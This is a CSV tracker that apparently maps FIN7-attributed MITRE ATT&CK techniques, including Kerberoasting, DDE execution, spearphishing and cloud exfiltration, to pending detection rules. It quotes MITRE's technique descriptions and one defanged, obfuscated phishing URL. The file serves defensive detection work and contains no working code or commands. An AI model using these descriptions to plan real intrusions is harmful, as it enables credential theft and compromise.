Technique ID,Name,Tactics,Status,Linked Rule,Liczba wykryć,Author,Description,MITRE Link,ChangeHistory
T1558.003,Kerberoasting,Credential-Access,Pending,alerts\FIN7\T1558.003_Kerberoasting.html,,APT Matrix Generator,"Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015)   Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)  Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)  This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)  Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)",https://attack.mitre.org/techniques/T1558/003/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1559.002,Dynamic Data Exchange,Execution,Pending,alerts\FIN7\T1559.002_Dynamic_Data_Exchange.html,,APT Matrix Generator,"Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.  Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)  Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )  DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)",https://attack.mitre.org/techniques/T1559/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1566.001,Spearphishing Attachment,Initial-Access,Pending,alerts\FIN7\T1566.001_Spearphishing_Attachment.html,,APT Matrix Generator,"Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.  There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ",https://attack.mitre.org/techniques/T1566/001/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1566.002,Spearphishing Link,Initial-Access,Pending,alerts\FIN7\T1566.002_Spearphishing_Link.html,,APT Matrix Generator,"Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.  All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.  Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an ""IDN homograph attack"").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)  Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to  [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)  Adversaries may also utilize spearphishing links to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured through “consent phishing” into granting adversaries permissions/access via a malicious OAuth 2.0 request URL .(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)  Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)",https://attack.mitre.org/techniques/T1566/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1567.002,Exfiltration to Cloud Storage,Exfiltration,Pending,alerts\FIN7\T1567.002_Exfiltration_to_Cloud_Storage.html,,APT Matrix Generator,"Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.  Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",https://attack.mitre.org/techniques/T1567/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1571,Non-Standard Port,Command-And-Control,Pending,alerts\FIN7\T1571_Non-Standard_Port.html,,APT Matrix Generator,"Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.  Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)",https://attack.mitre.org/techniques/T1571/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1583.001,Domains,Resource-Development,Pending,alerts\FIN7\T1583.001_Domains.html,,APT Matrix Generator,"Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.  Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute ""IDN homograph attacks,"" creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)  Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)  Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)  Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)  In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)",https://attack.mitre.org/techniques/T1583/001/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1583.006,Web Services,Resource-Development,Pending,alerts\FIN7\T1583.006_Web_Services.html,,APT Matrix Generator,"Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google, GitHub, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29)(Citation: Hacker News GitHub Abuse 2024) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",https://attack.mitre.org/techniques/T1583/006/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1587.001,Malware,Resource-Development,Pending,alerts\FIN7\T1587.001_Malware.html,,APT Matrix Generator,"Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)  As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.  Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)",https://attack.mitre.org/techniques/T1587/001/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1588.002,Tool,Resource-Development,Pending,alerts\FIN7\T1588.002_Tool.html,,APT Matrix Generator,"Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)  Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).",https://attack.mitre.org/techniques/T1588/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1608.001,Upload Malware,Resource-Development,Pending,alerts\FIN7\T1608.001_Upload_Malware.html,,APT Matrix Generator,"Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.  Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)  Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.",https://attack.mitre.org/techniques/T1608/001/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1608.004,Drive-by Target,Resource-Development,Pending,alerts\FIN7\T1608.004_Drive-by_Target.html,,APT Matrix Generator,"Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).  Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:  * Inserting malicious scripts into web pages or other user controllable web content such as forum posts * Modifying script files served to websites from publicly writeable cloud storage buckets * Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))  In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)  Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.  Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",https://attack.mitre.org/techniques/T1608/004/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
